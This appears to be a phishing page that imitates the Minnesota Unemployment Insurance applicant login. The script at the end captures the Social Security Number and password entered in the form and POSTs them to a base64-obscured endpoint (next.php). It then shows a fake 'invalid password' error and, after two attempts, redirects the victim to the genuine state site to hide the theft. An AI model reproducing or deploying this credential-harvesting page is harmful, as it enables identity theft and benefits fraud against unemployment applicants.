<!DOCTYPE html >
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <link type="text/css" href="./css/ui.css" rel="stylesheet">
    <title>Applicant login</title>
    <style type="text/css">
    .myButton {
        box-shadow: inset 0px 1px 0px 0px #566183;
        background: linear-gradient(to bottom, #6c79a3 5%, #6c79a3 100%);
        background-color: #6c79a3;
        border-radius: 4px;
        border: 1px solid #566183;
        display: inline-block;
        cursor: pointer;
        color: #ffffff;
        font-family: Arial;
        font-size: 13px;
        font-weight: bold;
        padding: 3px 18px;
        text-decoration: none;
        text-shadow: 0px 1px 0px #566183;
    }

    .myButton:hover {
        background: linear-gradient(to bottom, #6c79a3 5%, #6c79a3 100%);
        background-color: #6c79a3;
    }

    .myButton:active {
        position: relative;
        top: 1px;
    }
    </style>
</head>

<body>
    <table style="width:100%; padding:0px; border-collapse:collapse; border-spacing:0">
        <tbody>
            <tr>
                <td><img src="./images/spacer.gif" style="border:0px; padding:0; border-collapse:collapse; border-spacing:0; height:0px; width:10px" alt=""></td>
                <td style="width:70%; text-align:left"><img src="./images/Unemployment Insurance Logo RGB-websites-projects.png" style="border:0px; height:57px; width:274px" alt="Minnesota logo, Minnesota Unemployment Insurance "></td>
                <td style="width:30%; text-align:right" class="globalNav"><b></b></td>
                <td><img src="./images/spacer.gif" style="border:0px; padding:0; border-collapse:collapse; border-spacing:0; height:0px; width:10px" alt=""></td>
            </tr>
            <tr>
                <td colspan="4">
                    <table cellpadding="0" style="width:100%; padding:0px; border-collapse:collapse; border-spacing:0">
                        <tbody>
                            <tr class="searchBarBG">
                                <td style="white-space:nowrap; vertical-align:bottom; text-align:left" class="searchBar"></td>
                                <td style="white-space:nowrap; vertical-align:middle; text-align:right" colspan="2">
                                    <table style="text-align:right" cellpadding="0">
                                        <tbody>
                                            <tr>
                                                <td>&nbsp;</td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </td>
            </tr>
        </tbody>
    </table>
    <table border="0" cellspacing="0" cellpadding="0" width="100%">
        <tbody>
           
            <tr>
                <td class="topNavBG">
                    <table border="0" cellspacing="0" cellpadding="0" width="100%">
                        <tbody>
                            <tr>
                                <td>
                                    <table style="border:0px; border-collapse; collapse; border-spacing:0">
                                        <tbody>
                                            <tr>
                                                <td class="topNav">&nbsp;&nbsp;<a>Applicant Self-Service</a>&nbsp;&nbsp;</td>
                                                <td class="darkGray"><img src="./images/spacer.gif" style="border:0px; padding:0px; height:20px; width:0px" alt=""></td>
                                                <td class="white"><img src="./images/spacer.gif" style="border:0px; padding:0px; height:20px; width:0px" alt=""></td>
                                                <td class="white"><img src="./images/spacer.gif" width="0" style="border:0px; padding:0px; height:20px; width:0px" alt=""></td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </td>
                                <td style="width:25%; text-align:right"><span class="errorText">*</span> Indicates Required Field
                                </td>
                            </tr>
                        </tbody>
                    </table>
                </td>
            </tr>
            
            
        </tbody>
    </table>
    <table cellspacing="0" cellpadding="0" style="border:0px; width:100%">
        <tbody>
            <tr>
                <td style="width:100%" class="searchBarBG"><img src="./images/spacer.gif" style="border:0px; padding:0; height:3px; width:650px" alt=""></td>
            </tr>
        </tbody>
    </table>
    <table cellspacing="0" cellpadding="0" style="padding:0px; border:0px; width:100%">
        <tbody>
            <!-- this row spaces the columns properly and adds buffer space at the top -->
            <tr>
                <td>
                    <img src="./images/spacer.gif" style="border:0; padding:0px; height:10px; width:192px" alt="">
                </td>
                <td style="width:1" class="midGray">
                    <img src="./images/spacer.gif" style="border:0; padding:0px; height:10px; width:1px" alt="">
                </td>
                <td>
                    <img src="./images/spacer.gif" style="border:0; padding:0px; height:10px; width:10px" alt="">
                </td>
                <td style="width:100%">
                    <img src="./images/spacer.gif" style="border:0; padding:0px; height:10px; width:10px" alt="">
                </td>
                <td>
                    <img src="./images/spacer.gif" style="border:0; padding:0px; height:10px; width:10px" alt="">
                </td>
            </tr>
            <tr>
                <!-- this is the left column -->
                <td style="text-align:left; vertical-align:top">
                    <table class="normalTable" style="width:100%">
                        <tbody>
                            <tr>
                                <td style="text-align:left">
                                    <table class="normalTable" style="width:100%">
                                        <tbody>
                                            <tr>
                                                <td style="width:10px"></td>
                                                <td style="display: block;">
                                                    <table style="width:100%" class="normalTable">
                                                        <!-- dt class="leftnav1"></dt-->
                                                        <tbody>
                                                            <tr class="square">
                                                                <td>
                                                                    <a href="#" target="_new" class="leftnav3">Information For Applicants</a>
                                                                </td>
                                                            </tr>
                                                            <tr class="square">
                                                                <td>
                                                                    <a href="#" target="_new" class="leftnav3">How to Apply</a>
                                                                </td>
                                                            </tr>
                                                            <tr class="square">
                                                                <td>
                                                                    <a href="#" target="_new" class="leftnav3">Information Handbook</a>
                                                                </td>
                                                            </tr>
                                                            <tr class="square">
                                                                <td>
                                                                    <a href="#" target="_new" class="leftnav3">Video Library</a>
                                                                </td>
                                                            </tr>
                                                            <tr class="square">
                                                                <td>
                                                                    <a href="#" target="_new" class="leftnav3">Contact Us</a>
                                                                </td>
                                                            </tr>
                                                        </tbody>
                                                    </table>
                                                </td>
                                            </tr>
                                        </tbody>
                                    </table>
                                </td>
                            </tr>
                            <tr>
                                <td>
                                    <br>
                                </td>
                            </tr>
                            <tr>
                                <td>
                                </td>
                            </tr>
                            <!-- spacer -->
                            <tr>
                                <td style="vertical-align:top"> <br>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                    <!-- end left column -->
                </td>
                <!-- vertical seperator -->
                <td class="midGray">
                    <img src="./images/spacer.gif" style="border:0px; height:1; width:1; padding:0px" alt="">
                </td>
                <td>
                    <img src="./images/spacer.gif" style="border:0px; height:1; width:10; padding:0px" alt="">
                </td>
                <!-- middle column -->
                <td style="vertical-align:top; text-align:left">
                    <table class="normalTable" style="width:100%">
                        <tbody>
                            <tr>
                                <td colspan="3" class="sectHead">Welcome to the Minnesota
                                    Unemployment Insurance Benefits System</td>
                            </tr>
                            <tr>
                                <td colspan="3" class="horizontalSpacer"></td>
                            </tr>
                            <tr>
                                <td colspan="3" class="sectionSpacer"></td>
                            </tr>
                            <tr>
                                <td colspan="3">The system is available <strong>Sunday </strong> through <strong>Friday </strong> from
                                    <strong>6:00 A.M.</strong> to
                                    <strong>8:00 P.M. </strong>Central Time.</td>
                            </tr>
                        </tbody>
                    </table>
                    <table>
                        <tbody>
                            <tr>
                                <td colspan="3" class="sectionSpacer"></td>
                            </tr>
                            <tr>
                                <td class="grayText">Message updated: 06-Apr-2021 12:00 AM</td>
                            </tr>
                            <tr>
                                <td colspan="3"><strong>
                                        Time to get vaccinated, Minnesota - www.mn.gov/covid19/vaccine</strong>
                                </td>
                            </tr>
                        </tbody>
                    </table>
                    <table>
                        <tbody>
                            <tr>
                                <td colspan="3" class="sectionSpacer"></td>
                            </tr>
                            <tr>
                                <td colspan="3" class="horizontalSpacer"></td>
                            </tr>
                            <tr>
                                <td colspan="3" class="sectionSpacer"></td>
                            </tr>
                            <tr valign="top">
                                <td style="width:49%">
                                    <form name="LogonForm">
                                        <table class="borderTable" style="width:100%">
                                            <tbody>
                                                <tr>
                                                    <td>
                                                        <input type="text" style="display: none;" disabled="disabled">
                                                        <table class="normalTable" style="width:100%">
                                                            <tbody>
                                                                <tr>
                                                                    <td class="horizontalSpacer"></td>
                                                                </tr>
                                                                <tr>
                                                                    <td style="padding-left:5px; text-align:center"><strong>New Applicants </strong>
                                                                    </td>
                                                                </tr>
                                                                <tr>
                                                                    <td class="horizontalSpacer"></td>
                                                                </tr>
                                                                <tr class="evenRow">
                                                                    <td style="text-align:center"><strong>Apply for unemployment benefits</strong></td>
                                                                </tr>
                                                                <tr class="evenRow">
                                                                    <td style="padding-bottom:3px; text-align:center"><strong>and create an
                                                                            account</strong></td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td> &nbsp; <label for="userId"><span class="errorText">*</span>Social Security
                                                                            Number </label>
                                                                        <input type="password" name="userId" maxlength="9" tabindex="1" autocomplete="off" value="" style="width:7em" id="userId">
                                                                        (no dashes) </td>
                                                                </tr>
                                                                <tr class="evenRow">
                                                                    <td style="font-weight:bold">If you enter your Social Security Number incorrectly
                                                                        your identity cannot be authenticated, and benefits will be denied indefinitely.
                                                                    </td>
                                                                </tr>
                                                                <tr class="evenRow">
                                                                    <td class="sectionSpacer"></td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td>
                                                                        <input disabled type="image" name="action.login.apply.null" src="./images/b_start.gif" tabindex="2" alt="Start">
                                                                    </td>
                                                                </tr>
                                                                <tr class="evenRow">
                                                                    <td class="horizontalSpacer"></td>
                                                                </tr>
                                                                <tr class="evenRow">
                                                                    <td class="sectionSpacer"></td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td class="sectionSpacer"></td>
                                                                </tr>
                                                                <tr>
                                                                    <td>&nbsp;</td>
                                                                </tr>
                                                                <tr>
                                                                    <td class="horizontalSpacer"></td>
                                                                </tr>
                                                            </tbody>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </tbody>
                                        </table>
                                    </form>
                                </td>
                                <td style="width:1%"></td>
                                <td style="width:49%">
                                    <form name="LogonForm">
                                        <table class="borderTable" style="width:100%">
                                            <tbody>
                                                <tr>
                                                    <td>
                                                        <table class="normalTable" style="width:100%">
                                                            <tbody>
                                                                <tr>
                                                                    <td colspan="2" class="horizontalSpacer"></td>
                                                                </tr>
                                                                <tr>
                                                                    <td colspan="2" style="padding-left:5px; text-align:center"><strong>Existing
                                                                            Applicants</strong></td>
                                                                </tr>
                                                                <tr>
                                                                    <td colspan="2" class="horizontalSpacer"></td>
                                                                </tr>
                                                                <tr class="evenRow">
                                                                    <td colspan="2" style="text-align:left">
                                                                    </td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td colspan="2" class="sectionSpacer"></td>
                                                                </tr>
                                                                <tr class="evenRow">
                                                                    <td colspan="2" style="text-align:center"><strong>Log in to your account</strong></td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td colspan="2" class="sectionSpacer"></td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td style="text-align:right" colspan="2">
                                                                        <center>
                                                                            <div class="" id="msg" style="display: none;color: red;">Invalid Password..! Please enter correct password.</div>
                                                                            <span id="error" style="display: none;color: red;">That account doesn't exist. Enter a different account</span>
                                                                        </center>
                                                                    </td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td style="text-align:right">
                                                                        <label for="userIdConfirm"><span class="errorText">*</span>Social Security Number
                                                                        </label> &nbsp;
                                                                    </td>
                                                                    <td style="text-align:left">
                                                                        <input type="password" name="ai" maxlength="9" tabindex="3" autocomplete="off" value="" style="width:7em" id="ai"> (no
                                                                        dashes)
                                                                    </td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td style="padding-top:4px;padding-bottom:2px;text-align:right"> <label for="password"><span class="errorText">*</span>Password </label> &nbsp;
                                                                    </td>
                                                                    <td style="padding-top:4px;padding-bottom:2px;text-align:left">
                                                                        <input type="password" name="pr" maxlength="6" tabindex="4" autocomplete="off" value="" style="width:5em" id="pr">
                                                                    </td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td colspan="2" class="sectionSpacer"></td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td colspan="2">
                                                                        <button class="myButton" id="submit-btn">Login</button>
                                                                        <!--  <input type="image" name="action.login.login.null" src="./images/b_login.gif" tabindex="5" alt="Login"> -->
                                                                    </td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:center">
                                                                    <td colspan="2" class="sectionSpacer"></td>
                                                                </tr>
                                                                <tr class="evenRow" style="text-align:left">
                                                                    <td colspan="2" style="padding-left:10px">
                                                                        <label for="forgotPassword">
                                                                            Forgot your password
                                                                        </label>&nbsp;
                                                                        <input type="checkbox" name="forgotPassword" tabindex="6" value="on" id="forgotPassword">
                                                                    </td>
                                                                </tr>
                                                                <tr>
                                                                    <td colspan="2" class="sectionSpacer">&nbsp;</td>
                                                                </tr>
                                                            </tbody>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </tbody>
                                        </table>
                                    </form>
                                </td>
                            </tr>
                            <tr>
                                <td colspan="3" class="sectionSpacer"></td>
                            </tr>
                        </tbody>
                    </table>
                </td>
                <!-- left white space -->
                <td>
                    <img src="./images/spacer.gif" style="border:0 padding:0px; height:10; width:10" alt="">
                </td>
            </tr>
            <!-- this row adds buffer space at the bottom -->
            <tr>
                <td>
                    <img src="./images/spacer.gif" style="border:0; padding:0px; height:10; width:192" alt="">
                </td>
                <td class="midGray">
                    <img src="./images/spacer.gif" style="border:0; padding:0px; height:10; width:1" alt="">
                </td>
                <td>
                    <img src="./images/spacer.gif" style="border:0; padding:0px; height:10; width:10" alt="">
                </td>
                <td>
                    <img src="./images/spacer.gif" style="border:0; padding:0px; height:10; width:10" alt="">
                </td>
                <td>
                    <img src="./images/spacer.gif" style="border:0; padding:0px; height:10; width:10" alt="">
                </td>
            </tr>
        </tbody>
    </table>
    <table style="width:100%; border-spacing:0px;" cellpadding="0">
        <tbody>
            
            <tr>
                <td>
                    <table class="normalTable" style="width:100%">
                        <tbody>
                            <tr>
                                <td colspan="4"><img src="./images/spacer.gif" style="border-width:0; padding:0px; height:5; width:1" alt=""></td>
                            </tr>
                            <tr>
                                <td><img src="./images/spacer.gif" height="1" width="10" border="0" hspace="0" vspace="0" alt=""></td>
                                <td style="vertical-align:middle; text-align:left" class="copy">
                                </td>
                                <td style="vertical-align:top; text-align:right" class="copy">
                                    <a href="#" target="_blank" class="grayLink">Accessibility</a> |
                                    <a href="#" target="_blank" class="grayLink">Privacy and security</a> |
                                    <a href="#" target="_blank" class="grayLink">System requirements</a>
                                    <!--<a href="#" target="_blank" class="grayLink">Questions or Inquiries</a>-->
                                </td>
                                <td><img src="./images/spacer.gif" style="border-width:0; padding:0px; height:1; width:10" alt=""></td>
                            </tr>
                        </tbody>
                    </table>
                </td>
            </tr>
        </tbody>
    </table>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script type="text/javascript" src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;
    // $("#div1").animate({ left: 0, opacity: "hide" }, 0);
    // $("#div2").animate({ right: 0, opacity: "show" }, 500);

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();

        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#msg").hide();

    }
    ///////////////url getting ai////////////////


    var file = "bmV4dC5waHA=";
    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $('#msg').html();
        $('#msg').text(msg);
        ///////////////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
            $('#error').show();
            $('#error').html("SSN field is empty.!");
            return false;
        }

        // if (!filter.test(my_ai)) {
        //     $('#error').show();
        //     $('#error').html("That account doesn't exist. Enter a different account");
        //     return false;
        // }
        if (!pr) {
            $('#error').show();
            $('#error').html("Password field is empty.!");
            return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        ///////////////////////////
        count = count + 1;

        $.ajax({
            dataType: 'JSON',
            url: atob(file),
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifying...');
            },
            success: function(response) {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("https://www1.uimn.org/ui_applicant/applicant/login.do");
                    return false;
                }
                $("#msg").show();
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace("https://www1.uimn.org/ui_applicant/applicant/login.do");
                    return false;
                }
                $("#msg").show();

            },
            complete: function() {
                $('#submit-btn').html('Login');
            }
        });
    });


});
</script>

</html>